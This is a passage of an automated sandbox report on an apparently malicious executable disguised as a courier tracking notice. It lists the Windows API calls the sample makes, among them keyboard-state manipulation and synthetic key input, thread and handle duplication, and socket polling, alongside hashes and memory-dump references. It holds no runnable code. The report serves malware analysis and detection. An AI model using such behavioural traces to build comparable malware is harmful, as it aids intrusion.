                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                      • String ID:
                                      • API String ID: 3257027151-0
                                      • Opcode ID: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                      • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                      • Opcode Fuzzy Hash: c981ea3ceee1feb4f68cdf1bad830475cd4f783826951488cb1c5ff232b53bc9
                                      • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                      APIs
                                      • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 0046D3D3
                                      • WSAGetLastError.WSOCK32(00000000), ref: 0046D3E4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorLastselect
                                      • String ID:
                                      • API String ID: 215497628-0
                                      • Opcode ID: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                      • Instruction ID: fadcceb5308e48970113ceaff65c18732520a09434288b0a98514d96d8681c7b
                                      • Opcode Fuzzy Hash: a2339aeea388287f00fab5c9ba0e4a7d07c2007cb3e616b5232981a1bd598a56
                                      • Instruction Fuzzy Hash: 65510772E001046BD710EF69DC85FAEB3A8EB94320F14856EF905D7381EA35DD41C7A5
                                      APIs
                                      • GetParent.USER32(?), ref: 0044443B
                                      • GetKeyboardState.USER32(?), ref: 00444450
                                      • SetKeyboardState.USER32(?), ref: 004444A4
                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                      • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                      • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                      • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                      APIs
                                      • GetParent.USER32(?), ref: 00444633
                                      • GetKeyboardState.USER32(?), ref: 00444648
                                      • SetKeyboardState.USER32(?), ref: 0044469C
                                      • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                      • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                      • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                      • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$Parent
                                      • String ID:
                                      • API String ID: 87235514-0
                                      • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                      • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                      • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                      • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                      APIs
                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                      • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                      • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                      • DeleteObject.GDI32(?), ref: 00455736
                                      • DeleteObject.GDI32(?), ref: 00455744
                                      • DestroyIcon.USER32(?), ref: 00455752
                                      • DestroyWindow.USER32(?), ref: 00455760
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                      • String ID:
                                      • API String ID: 2354583917-0
                                      • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                      • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                      • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                      • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                      • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                      • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                      • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                      APIs
                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                      • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$Enable$Show$MessageMoveSend
                                      • String ID:
                                      • API String ID: 896007046-0
                                      • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                      • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                      • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                      • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                      APIs
                                      • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                      • GetFocus.USER32 ref: 00448ACF
                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$Enable$Show$FocusMessageSend
                                      • String ID:
                                      • API String ID: 3429747543-0
                                      • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                      • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                      • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                      • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                      • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                      • __swprintf.LIBCMT ref: 0045D4E9
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$InformationVolume__swprintf
                                      • String ID: %lu$\VH
                                      • API String ID: 3164766367-2432546070
                                      • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                      • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                      • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                      • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                      APIs
                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                      • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                      • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend
                                      • String ID: Msctls_Progress32
                                      • API String ID: 3850602802-3636473452
                                      • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                      • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                      • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                      • Instruction Fuzzy Hash: 7A21667135030477EB20DEA9DC82F97B3AD9F94B24F21460AFB54A72D1C5B5F8418B58
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Destroy$DeleteImageList_ObjectWindow$Icon
                                      • String ID:
                                      • API String ID: 3985565216-0
                                      • Opcode ID: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                      • Instruction ID: 510e71718d61fb01ae158a6e5fa7ad280301b7661e5b3aef53c80a3471921dd4
                                      • Opcode Fuzzy Hash: 49ccd75876ce99cd15ee405d1ac93d8c116bb45471ccb95599c5d22b34275644
                                      • Instruction Fuzzy Hash: 70217E70200A00EFCB20DF25D9D4A2A77AABF48712F10896DE906CB356D739EC45CB69
                                      APIs
                                      • _malloc.LIBCMT ref: 0041F707
                                        • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                        • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                        • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                      • _free.LIBCMT ref: 0041F71A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free_malloc
                                      • String ID: [B
                                      • API String ID: 1020059152-632041663
                                      • Opcode ID: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                      • Instruction ID: 066e14217b5799beb7557260d36092b09813ce611e9d099bbd870b86b34de80c
                                      • Opcode Fuzzy Hash: 5ae3695c4899d33c0c5016eec090c96391fe5f6cd2bec6778d3ea2d81492c429
                                      • Instruction Fuzzy Hash: 0211EB32454615AACB213F75EC086DB3BA49F443A5B20053BF824CA2D1DB7C88C7C7AC
                                      APIs
                                        • Part of subcall function 00436B19: GetProcessHeap.KERNEL32(00000008,0000000C,00436C79), ref: 00436B1D
                                        • Part of subcall function 00436B19: HeapAlloc.KERNEL32(00000000), ref: 00436B24
                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 00436C88
                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 00436C91
                                      • DuplicateHandle.KERNEL32(00000000,?,00000000), ref: 00436C9A
                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00000000), ref: 00436CA6
                                      • GetCurrentProcess.KERNEL32(?,00000000,?,00000000), ref: 00436CAF
                                      • DuplicateHandle.KERNEL32(00000000,?,00000000,?,00000000), ref: 00436CB2
                                      • CreateThread.KERNEL32(00000000,00000000,Function_00036C2B,00000000,00000000,00000000), ref: 00436CCA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                      • String ID:
                                      • API String ID: 1957940570-0
                                      • Opcode ID: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                      • Instruction ID: 99b39fe8e7f3ac854e5c8e3994335d5d6f6ef2f737fc2b72a46a077924210789
                                      • Opcode Fuzzy Hash: 3f80535c3287afe012eec8eac85a3d96c91e040866ec74b6355b9bdb3dfb6838
                                      • Instruction Fuzzy Hash: A301E6753403047BD620EB65DC96F5B775CEB89B50F114819FA04DB1D1C6B5E8008B78
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 004302E6
                                      • GetWindowRect.USER32(00000000,?), ref: 00430316
                                      • GetClientRect.USER32(?,?), ref: 00430364
                                      • GetSystemMetrics.USER32(0000000F), ref: 004303B1
                                      • GetWindowRect.USER32(?,?), ref: 004303C3
                                      • ScreenToClient.USER32(?,?), ref: 004303EC
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Rect$Client$Window$MetricsScreenSystem
                                      • String ID:
                                      • API String ID: 3220332590-0
                                      • Opcode ID: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                      • Instruction ID: e4235e81f7515d2978e088f6fadb01cec8eb5fe04dcc4a3bbd5a83ea815e8f28
                                      • Opcode Fuzzy Hash: b722cec4de1de3fe17d9867fbb91cd497d3f089f761d48fb585960e999a4a017
                                      • Instruction Fuzzy Hash: 13A14875A0070A9BCB10CFA8C594BEFB7B1FF58314F00961AE9A9E7350E734AA44CB54
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _malloc_wcslen$_strcat_wcscpy
                                      • String ID:
                                      • API String ID: 1612042205-0
                                      • Opcode ID: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                      • Instruction ID: da8a40d04f443fc8bffa22af6bb0a7b3fb41b3e40a14b17b7fca75945af8e81c
                                      • Opcode Fuzzy Hash: 1b9af233a2167b707cd0fb77bd31ffbeeda7ae7db272e33850c6ed6ee2362a10
                                      • Instruction Fuzzy Hash: 40914A74604205EFCB10DF98D4C09A9BBA5FF48305B60C66AEC0A8B35AD738EE55CBD5
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _memmove_strncmp
                                      • String ID: >$U$\
                                      • API String ID: 2666721431-237099441
                                      • Opcode ID: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                      • Instruction ID: 902f5a6c35c0d49260658601fd29bdf8c292b60929ab84f6d376942388b5a00c
                                      • Opcode Fuzzy Hash: 22f22e1ac28dc69493aec85f3eea1e1d82883446f00fc80900d5fd24c0790888
                                      • Instruction Fuzzy Hash: 8DF1B170A00249CFEB14CFA9C8906AEFBF1FF89304F2485AED845A7341D779A946CB55
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 0044C570
                                      • SetKeyboardState.USER32(00000080), ref: 0044C594
                                      • PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
                                      • PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
                                      • PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
                                      • SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
                                      Memory Dump Source
